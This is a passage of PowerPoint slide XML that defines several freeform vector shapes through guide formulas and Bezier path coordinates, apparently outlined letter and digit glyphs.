                <a:gd name="T21" fmla="*/ 85 h 216"/>
                <a:gd name="T22" fmla="*/ 103 w 245"/>
                <a:gd name="T23" fmla="*/ 96 h 216"/>
                <a:gd name="T24" fmla="*/ 80 w 245"/>
                <a:gd name="T25" fmla="*/ 179 h 216"/>
                <a:gd name="T26" fmla="*/ 79 w 245"/>
                <a:gd name="T27" fmla="*/ 179 h 216"/>
                <a:gd name="T28" fmla="*/ 54 w 245"/>
                <a:gd name="T29" fmla="*/ 30 h 216"/>
                <a:gd name="T30" fmla="*/ 78 w 245"/>
                <a:gd name="T31" fmla="*/ 30 h 216"/>
                <a:gd name="T32" fmla="*/ 99 w 245"/>
                <a:gd name="T33" fmla="*/ 15 h 216"/>
                <a:gd name="T34" fmla="*/ 78 w 245"/>
                <a:gd name="T35" fmla="*/ 0 h 216"/>
                <a:gd name="T36" fmla="*/ 21 w 245"/>
                <a:gd name="T37" fmla="*/ 0 h 216"/>
                <a:gd name="T38" fmla="*/ 0 w 245"/>
                <a:gd name="T39" fmla="*/ 14 h 216"/>
                <a:gd name="T40" fmla="*/ 25 w 245"/>
                <a:gd name="T41" fmla="*/ 30 h 216"/>
                <a:gd name="T42" fmla="*/ 55 w 245"/>
                <a:gd name="T43" fmla="*/ 198 h 216"/>
                <a:gd name="T44" fmla="*/ 78 w 245"/>
                <a:gd name="T45" fmla="*/ 216 h 216"/>
                <a:gd name="T46" fmla="*/ 109 w 245"/>
                <a:gd name="T47" fmla="*/ 182 h 216"/>
                <a:gd name="T48" fmla="*/ 123 w 245"/>
                <a:gd name="T49" fmla="*/ 120 h 216"/>
                <a:gd name="T50" fmla="*/ 124 w 245"/>
                <a:gd name="T51" fmla="*/ 120 h 216"/>
                <a:gd name="T52" fmla="*/ 147 w 245"/>
                <a:gd name="T53" fmla="*/ 208 h 216"/>
                <a:gd name="T54" fmla="*/ 168 w 245"/>
                <a:gd name="T55" fmla="*/ 216 h 216"/>
                <a:gd name="T56" fmla="*/ 190 w 245"/>
                <a:gd name="T57" fmla="*/ 198 h 216"/>
                <a:gd name="T58" fmla="*/ 220 w 245"/>
                <a:gd name="T59" fmla="*/ 30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5" h="216">
                  <a:moveTo>
                    <a:pt x="220" y="30"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="235" y="30"/>
                    <a:pt x="245" y="30"/>
                    <a:pt x="245" y="14"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="245" y="0"/>
                    <a:pt x="233" y="0"/>
                    <a:pt x="224" y="0"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="167" y="0"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="158" y="0"/>
                    <a:pt x="146" y="0"/>
                    <a:pt x="146" y="14"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="146" y="30"/>
                    <a:pt x="157" y="30"/>
                    <a:pt x="167" y="30"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="191" y="30"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="166" y="179"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="166" y="179"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="164" y="166"/>
                    <a:pt x="157" y="143"/>
                    <a:pt x="151" y="122"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="142" y="91"/>
                    <a:pt x="141" y="85"/>
                    <a:pt x="123" y="85"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="118" y="85"/>
                    <a:pt x="109" y="85"/>
                    <a:pt x="103" y="96"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="102" y="100"/>
                    <a:pt x="82" y="169"/>
                    <a:pt x="80" y="179"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="79" y="179"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="54" y="30"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="78" y="30"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="87" y="30"/>
                    <a:pt x="99" y="30"/>
                    <a:pt x="99" y="15"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="99" y="0"/>
                    <a:pt x="87" y="0"/>
                    <a:pt x="78" y="0"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="21" y="0"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="12" y="0"/>
                    <a:pt x="0" y="0"/>
                    <a:pt x="0" y="14"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="30"/>
                    <a:pt x="10" y="30"/>
                    <a:pt x="25" y="30"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="55" y="198"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="57" y="209"/>
                    <a:pt x="59" y="216"/>
                    <a:pt x="78" y="216"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="98" y="216"/>
                    <a:pt x="100" y="212"/>
                    <a:pt x="109" y="182"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="121" y="138"/>
                    <a:pt x="122" y="131"/>
                    <a:pt x="123" y="120"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="124" y="120"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="126" y="146"/>
                    <a:pt x="145" y="204"/>
                    <a:pt x="147" y="208"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="153" y="216"/>
                    <a:pt x="162" y="216"/>
                    <a:pt x="168" y="216"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="186" y="216"/>
                    <a:pt x="188" y="208"/>
                    <a:pt x="190" y="198"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="220"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63" name="Freeform 904">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{49B03762-638F-444E-A49B-EDB24DE18391}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks/>
            </p:cNvSpPr>
            <p:nvPr>
              <p:custDataLst>
                <p:tags r:id="rId80"/>
              </p:custDataLst>
            </p:nvPr>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="5160963" y="2109788"/>
              <a:ext cx="71438" cy="107950"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 112 w 210"/>
                <a:gd name="T1" fmla="*/ 110 h 310"/>
                <a:gd name="T2" fmla="*/ 53 w 210"/>
                <a:gd name="T3" fmla="*/ 125 h 310"/>
                <a:gd name="T4" fmla="*/ 53 w 210"/>
                <a:gd name="T5" fmla="*/ 30 h 310"/>
                <a:gd name="T6" fmla="*/ 172 w 210"/>
                <a:gd name="T7" fmla="*/ 30 h 310"/>
                <a:gd name="T8" fmla="*/ 192 w 210"/>
                <a:gd name="T9" fmla="*/ 15 h 310"/>
                <a:gd name="T10" fmla="*/ 172 w 210"/>
                <a:gd name="T11" fmla="*/ 0 h 310"/>
                <a:gd name="T12" fmla="*/ 38 w 210"/>
                <a:gd name="T13" fmla="*/ 0 h 310"/>
                <a:gd name="T14" fmla="*/ 18 w 210"/>
                <a:gd name="T15" fmla="*/ 20 h 310"/>
                <a:gd name="T16" fmla="*/ 18 w 210"/>
                <a:gd name="T17" fmla="*/ 153 h 310"/>
                <a:gd name="T18" fmla="*/ 34 w 210"/>
                <a:gd name="T19" fmla="*/ 173 h 310"/>
                <a:gd name="T20" fmla="*/ 49 w 210"/>
                <a:gd name="T21" fmla="*/ 166 h 310"/>
                <a:gd name="T22" fmla="*/ 112 w 210"/>
                <a:gd name="T23" fmla="*/ 141 h 310"/>
                <a:gd name="T24" fmla="*/ 175 w 210"/>
                <a:gd name="T25" fmla="*/ 210 h 310"/>
                <a:gd name="T26" fmla="*/ 98 w 210"/>
                <a:gd name="T27" fmla="*/ 280 h 310"/>
                <a:gd name="T28" fmla="*/ 38 w 210"/>
                <a:gd name="T29" fmla="*/ 248 h 310"/>
                <a:gd name="T30" fmla="*/ 45 w 210"/>
                <a:gd name="T31" fmla="*/ 232 h 310"/>
                <a:gd name="T32" fmla="*/ 23 w 210"/>
                <a:gd name="T33" fmla="*/ 210 h 310"/>
                <a:gd name="T34" fmla="*/ 0 w 210"/>
                <a:gd name="T35" fmla="*/ 234 h 310"/>
                <a:gd name="T36" fmla="*/ 98 w 210"/>
                <a:gd name="T37" fmla="*/ 310 h 310"/>
                <a:gd name="T38" fmla="*/ 210 w 210"/>
                <a:gd name="T39" fmla="*/ 210 h 310"/>
                <a:gd name="T40" fmla="*/ 112 w 210"/>
                <a:gd name="T41" fmla="*/ 1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0" h="310">
                  <a:moveTo>
                    <a:pt x="112" y="110"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="95" y="110"/>
                    <a:pt x="73" y="114"/>
                    <a:pt x="53" y="125"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="53" y="30"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="172" y="30"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="180" y="30"/>
                    <a:pt x="192" y="30"/>
                    <a:pt x="192" y="15"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="192" y="0"/>
                    <a:pt x="180" y="0"/>
                    <a:pt x="172" y="0"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="38" y="0"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="22" y="0"/>
                    <a:pt x="18" y="4"/>
                    <a:pt x="18" y="20"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="18" y="153"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="18" y="162"/>
                    <a:pt x="18" y="173"/>
                    <a:pt x="34" y="173"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="43" y="173"/>
                    <a:pt x="45" y="171"/>
                    <a:pt x="49" y="166"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="62" y="150"/>
                    <a:pt x="83" y="141"/>
                    <a:pt x="112" y="141"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="153" y="141"/>
                    <a:pt x="175" y="177"/>
                    <a:pt x="175" y="210"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="175" y="250"/>
                    <a:pt x="140" y="280"/>
                    <a:pt x="98" y="280"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="84" y="280"/>
                    <a:pt x="52" y="276"/>
                    <a:pt x="38" y="248"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="41" y="246"/>
                    <a:pt x="45" y="242"/>
                    <a:pt x="45" y="232"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="45" y="218"/>
                    <a:pt x="33" y="210"/>
                    <a:pt x="23" y="210"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="15" y="210"/>
                    <a:pt x="0" y="214"/>
                    <a:pt x="0" y="234"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="275"/>
                    <a:pt x="42" y="310"/>
                    <a:pt x="98" y="310"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="160" y="310"/>
                    <a:pt x="210" y="265"/>
                    <a:pt x="210" y="210"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="210" y="159"/>
                    <a:pt x="171" y="110"/>
                    <a:pt x="112" y="11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64" name="Freeform 905">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E1143696-12F2-46B0-AF36-C6189D0F9541}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks/>
            </p:cNvSpPr>
            <p:nvPr>
              <p:custDataLst>
                <p:tags r:id="rId81"/>
              </p:custDataLst>
            </p:nvPr>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="5245101" y="2109788"/>
              <a:ext cx="84138" cy="106363"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 136 w 245"/>
                <a:gd name="T1" fmla="*/ 120 h 304"/>
                <a:gd name="T2" fmla="*/ 123 w 245"/>
                <a:gd name="T3" fmla="*/ 167 h 304"/>
                <a:gd name="T4" fmla="*/ 122 w 245"/>
                <a:gd name="T5" fmla="*/ 167 h 304"/>
                <a:gd name="T6" fmla="*/ 73 w 245"/>
                <a:gd name="T7" fmla="*/ 12 h 304"/>
                <a:gd name="T8" fmla="*/ 48 w 245"/>
                <a:gd name="T9" fmla="*/ 0 h 304"/>
                <a:gd name="T10" fmla="*/ 20 w 245"/>
                <a:gd name="T11" fmla="*/ 0 h 304"/>
                <a:gd name="T12" fmla="*/ 0 w 245"/>
                <a:gd name="T13" fmla="*/ 15 h 304"/>
                <a:gd name="T14" fmla="*/ 27 w 245"/>
                <a:gd name="T15" fmla="*/ 30 h 304"/>
                <a:gd name="T16" fmla="*/ 27 w 245"/>
                <a:gd name="T17" fmla="*/ 274 h 304"/>
                <a:gd name="T18" fmla="*/ 0 w 245"/>
                <a:gd name="T19" fmla="*/ 289 h 304"/>
                <a:gd name="T20" fmla="*/ 20 w 245"/>
                <a:gd name="T21" fmla="*/ 304 h 304"/>
                <a:gd name="T22" fmla="*/ 61 w 245"/>
                <a:gd name="T23" fmla="*/ 304 h 304"/>
                <a:gd name="T24" fmla="*/ 81 w 245"/>
                <a:gd name="T25" fmla="*/ 289 h 304"/>
                <a:gd name="T26" fmla="*/ 55 w 245"/>
                <a:gd name="T27" fmla="*/ 274 h 304"/>
                <a:gd name="T28" fmla="*/ 55 w 245"/>
                <a:gd name="T29" fmla="*/ 36 h 304"/>
                <a:gd name="T30" fmla="*/ 55 w 245"/>
                <a:gd name="T31" fmla="*/ 36 h 304"/>
                <a:gd name="T32" fmla="*/ 94 w 245"/>
                <a:gd name="T33" fmla="*/ 161 h 304"/>
                <a:gd name="T34" fmla="*/ 107 w 245"/>
                <a:gd name="T35" fmla="*/ 195 h 304"/>
                <a:gd name="T36" fmla="*/ 122 w 245"/>
                <a:gd name="T37" fmla="*/ 203 h 304"/>
                <a:gd name="T38" fmla="*/ 140 w 245"/>
                <a:gd name="T39" fmla="*/ 192 h 304"/>
                <a:gd name="T40" fmla="*/ 190 w 245"/>
                <a:gd name="T41" fmla="*/ 36 h 304"/>
                <a:gd name="T42" fmla="*/ 190 w 245"/>
                <a:gd name="T43" fmla="*/ 36 h 304"/>
                <a:gd name="T44" fmla="*/ 190 w 245"/>
                <a:gd name="T45" fmla="*/ 274 h 304"/>
                <a:gd name="T46" fmla="*/ 164 w 245"/>
                <a:gd name="T47" fmla="*/ 289 h 304"/>
                <a:gd name="T48" fmla="*/ 184 w 245"/>
                <a:gd name="T49" fmla="*/ 304 h 304"/>
                <a:gd name="T50" fmla="*/ 225 w 245"/>
                <a:gd name="T51" fmla="*/ 304 h 304"/>
                <a:gd name="T52" fmla="*/ 245 w 245"/>
                <a:gd name="T53" fmla="*/ 289 h 304"/>
                <a:gd name="T54" fmla="*/ 218 w 245"/>
                <a:gd name="T55" fmla="*/ 274 h 304"/>
                <a:gd name="T56" fmla="*/ 218 w 245"/>
                <a:gd name="T57" fmla="*/ 30 h 304"/>
                <a:gd name="T58" fmla="*/ 245 w 245"/>
                <a:gd name="T59" fmla="*/ 15 h 304"/>
                <a:gd name="T60" fmla="*/ 225 w 245"/>
                <a:gd name="T61" fmla="*/ 0 h 304"/>
                <a:gd name="T62" fmla="*/ 197 w 245"/>
                <a:gd name="T63" fmla="*/ 0 h 304"/>
                <a:gd name="T64" fmla="*/ 170 w 245"/>
                <a:gd name="T65" fmla="*/ 20 h 304"/>
                <a:gd name="T66" fmla="*/ 136 w 245"/>
                <a:gd name="T67" fmla="*/ 12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5" h="304">
                  <a:moveTo>
                    <a:pt x="136" y="120"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="130" y="138"/>
                    <a:pt x="126" y="153"/>
                    <a:pt x="123" y="167"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="122" y="167"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="117" y="144"/>
                    <a:pt x="74" y="15"/>
                    <a:pt x="73" y="12"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="68" y="0"/>
                    <a:pt x="55" y="0"/>
                    <a:pt x="48" y="0"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="20" y="0"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="13" y="0"/>
                    <a:pt x="0" y="0"/>
                    <a:pt x="0" y="15"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="30"/>
                    <a:pt x="11" y="30"/>
                    <a:pt x="27" y="30"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="27" y="274"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="11" y="274"/>
                    <a:pt x="0" y="274"/>
                    <a:pt x="0" y="289"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="304"/>
                    <a:pt x="13" y="304"/>
                    <a:pt x="20" y="304"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="61" y="304"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="69" y="304"/>
                    <a:pt x="81" y="304"/>
                    <a:pt x="81" y="289"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="81" y="274"/>
                    <a:pt x="71" y="274"/>
                    <a:pt x="55" y="274"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="55" y="36"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="55" y="36"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="61" y="59"/>
                    <a:pt x="92" y="155"/>
                    <a:pt x="94" y="161"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="98" y="173"/>
                    <a:pt x="105" y="192"/>
                    <a:pt x="107" y="195"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="110" y="199"/>
                    <a:pt x="116" y="203"/>
                    <a:pt x="122" y="203"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="129" y="203"/>
                    <a:pt x="136" y="199"/>
                    <a:pt x="140" y="192"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="141" y="189"/>
                    <a:pt x="184" y="63"/>
                    <a:pt x="190" y="36"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="190" y="36"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="190" y="274"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="174" y="274"/>
                    <a:pt x="164" y="274"/>
                    <a:pt x="164" y="289"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="164" y="304"/>
                    <a:pt x="176" y="304"/>
                    <a:pt x="184" y="304"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="225" y="304"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="232" y="304"/>
                    <a:pt x="245" y="304"/>
                    <a:pt x="245" y="289"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="245" y="274"/>
                    <a:pt x="234" y="274"/>
                    <a:pt x="218" y="274"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="218" y="30"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="234" y="30"/>
                    <a:pt x="245" y="30"/>
                    <a:pt x="245" y="15"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="245" y="0"/>
                    <a:pt x="232" y="0"/>
                    <a:pt x="225" y="0"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="197" y="0"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="176" y="0"/>
                    <a:pt x="174" y="7"/>
                    <a:pt x="170" y="20"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="136" y="12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65" name="Freeform 906">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6D2EDD09-D989-4352-ADA2-0E4F02B2C97A}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks noEditPoints="1"/>
            </p:cNvSpPr>
            <p:nvPr>
              <p:custDataLst>
                <p:tags r:id="rId82"/>
              </p:custDataLst>
            </p:nvPr>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="5338763" y="2109788"/>
              <a:ext cx="80963" cy="107950"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 161 w 238"/>
                <a:gd name="T1" fmla="*/ 280 h 307"/>
                <a:gd name="T2" fmla="*/ 181 w 238"/>
                <a:gd name="T3" fmla="*/ 304 h 307"/>
                <a:gd name="T4" fmla="*/ 217 w 238"/>
                <a:gd name="T5" fmla="*/ 304 h 307"/>
                <a:gd name="T6" fmla="*/ 238 w 238"/>
                <a:gd name="T7" fmla="*/ 289 h 307"/>
                <a:gd name="T8" fmla="*/ 218 w 238"/>
                <a:gd name="T9" fmla="*/ 274 h 307"/>
                <a:gd name="T10" fmla="*/ 195 w 238"/>
                <a:gd name="T11" fmla="*/ 274 h 307"/>
                <a:gd name="T12" fmla="*/ 195 w 238"/>
                <a:gd name="T13" fmla="*/ 20 h 307"/>
                <a:gd name="T14" fmla="*/ 175 w 238"/>
                <a:gd name="T15" fmla="*/ 0 h 307"/>
                <a:gd name="T16" fmla="*/ 139 w 238"/>
                <a:gd name="T17" fmla="*/ 0 h 307"/>
                <a:gd name="T18" fmla="*/ 118 w 238"/>
                <a:gd name="T19" fmla="*/ 15 h 307"/>
                <a:gd name="T20" fmla="*/ 138 w 238"/>
                <a:gd name="T21" fmla="*/ 30 h 307"/>
                <a:gd name="T22" fmla="*/ 161 w 238"/>
                <a:gd name="T23" fmla="*/ 30 h 307"/>
                <a:gd name="T24" fmla="*/ 161 w 238"/>
                <a:gd name="T25" fmla="*/ 109 h 307"/>
                <a:gd name="T26" fmla="*/ 102 w 238"/>
                <a:gd name="T27" fmla="*/ 87 h 307"/>
                <a:gd name="T28" fmla="*/ 0 w 238"/>
                <a:gd name="T29" fmla="*/ 197 h 307"/>
                <a:gd name="T30" fmla="*/ 98 w 238"/>
                <a:gd name="T31" fmla="*/ 307 h 307"/>
                <a:gd name="T32" fmla="*/ 161 w 238"/>
                <a:gd name="T33" fmla="*/ 280 h 307"/>
                <a:gd name="T34" fmla="*/ 161 w 238"/>
                <a:gd name="T35" fmla="*/ 172 h 307"/>
                <a:gd name="T36" fmla="*/ 161 w 238"/>
                <a:gd name="T37" fmla="*/ 208 h 307"/>
                <a:gd name="T38" fmla="*/ 100 w 238"/>
                <a:gd name="T39" fmla="*/ 277 h 307"/>
                <a:gd name="T40" fmla="*/ 35 w 238"/>
                <a:gd name="T41" fmla="*/ 197 h 307"/>
                <a:gd name="T42" fmla="*/ 104 w 238"/>
                <a:gd name="T43" fmla="*/ 117 h 307"/>
                <a:gd name="T44" fmla="*/ 161 w 238"/>
                <a:gd name="T45" fmla="*/ 17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8" h="307">
                  <a:moveTo>
                    <a:pt x="161" y="280"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="161" y="297"/>
                    <a:pt x="161" y="304"/>
                    <a:pt x="181" y="304"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="217" y="304"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="225" y="304"/>
                    <a:pt x="238" y="304"/>
                    <a:pt x="238" y="289"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="238" y="274"/>
                    <a:pt x="225" y="274"/>
                    <a:pt x="218" y="274"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="195" y="274"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="195" y="20"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="195" y="5"/>
                    <a:pt x="192" y="0"/>
                    <a:pt x="175" y="0"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="139" y="0"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="131" y="0"/>
                    <a:pt x="118" y="0"/>
                    <a:pt x="118" y="15"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="118" y="30"/>
                    <a:pt x="131" y="30"/>
                    <a:pt x="138" y="30"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="161" y="30"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="161" y="109"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="144" y="95"/>
                    <a:pt x="124" y="87"/>
                    <a:pt x="102" y="87"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="48" y="87"/>
                    <a:pt x="0" y="134"/>
                    <a:pt x="0" y="197"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="259"/>
                    <a:pt x="45" y="307"/>
                    <a:pt x="98" y="307"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="126" y="307"/>
                    <a:pt x="147" y="294"/>
                    <a:pt x="161" y="280"/>
                  </a:cubicBezTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="161" y="172"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="161" y="208"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="161" y="236"/>
                    <a:pt x="138" y="277"/>
                    <a:pt x="100" y="277"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="65" y="277"/>
                    <a:pt x="35" y="242"/>
                    <a:pt x="35" y="197"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="35" y="149"/>
                    <a:pt x="70" y="117"/>
                    <a:pt x="104" y="117"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="136" y="117"/>
                    <a:pt x="161" y="145"/>
                    <a:pt x="161" y="17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66" name="Freeform 907">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{588298C3-CBBF-497A-A4A7-874CE6EDA7E4}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks noEditPoints="1"/>
            </p:cNvSpPr>
            <p:nvPr>
              <p:custDataLst>
                <p:tags r:id="rId83"/>
              </p:custDataLst>
            </p:nvPr>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="5430838" y="2108201"/>
              <a:ext cx="73025" cy="109538"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 36 w 209"/>
                <a:gd name="T1" fmla="*/ 142 h 316"/>
                <a:gd name="T2" fmla="*/ 133 w 209"/>
                <a:gd name="T3" fmla="*/ 31 h 316"/>
                <a:gd name="T4" fmla="*/ 161 w 209"/>
                <a:gd name="T5" fmla="*/ 39 h 316"/>
                <a:gd name="T6" fmla="*/ 156 w 209"/>
                <a:gd name="T7" fmla="*/ 53 h 316"/>
                <a:gd name="T8" fmla="*/ 178 w 209"/>
                <a:gd name="T9" fmla="*/ 75 h 316"/>
                <a:gd name="T10" fmla="*/ 200 w 209"/>
                <a:gd name="T11" fmla="*/ 52 h 316"/>
                <a:gd name="T12" fmla="*/ 134 w 209"/>
                <a:gd name="T13" fmla="*/ 0 h 316"/>
                <a:gd name="T14" fmla="*/ 0 w 209"/>
                <a:gd name="T15" fmla="*/ 161 h 316"/>
                <a:gd name="T16" fmla="*/ 105 w 209"/>
                <a:gd name="T17" fmla="*/ 316 h 316"/>
                <a:gd name="T18" fmla="*/ 209 w 209"/>
                <a:gd name="T19" fmla="*/ 214 h 316"/>
                <a:gd name="T20" fmla="*/ 110 w 209"/>
                <a:gd name="T21" fmla="*/ 113 h 316"/>
                <a:gd name="T22" fmla="*/ 36 w 209"/>
                <a:gd name="T23" fmla="*/ 142 h 316"/>
                <a:gd name="T24" fmla="*/ 105 w 209"/>
                <a:gd name="T25" fmla="*/ 286 h 316"/>
                <a:gd name="T26" fmla="*/ 44 w 209"/>
                <a:gd name="T27" fmla="*/ 231 h 316"/>
                <a:gd name="T28" fmla="*/ 41 w 209"/>
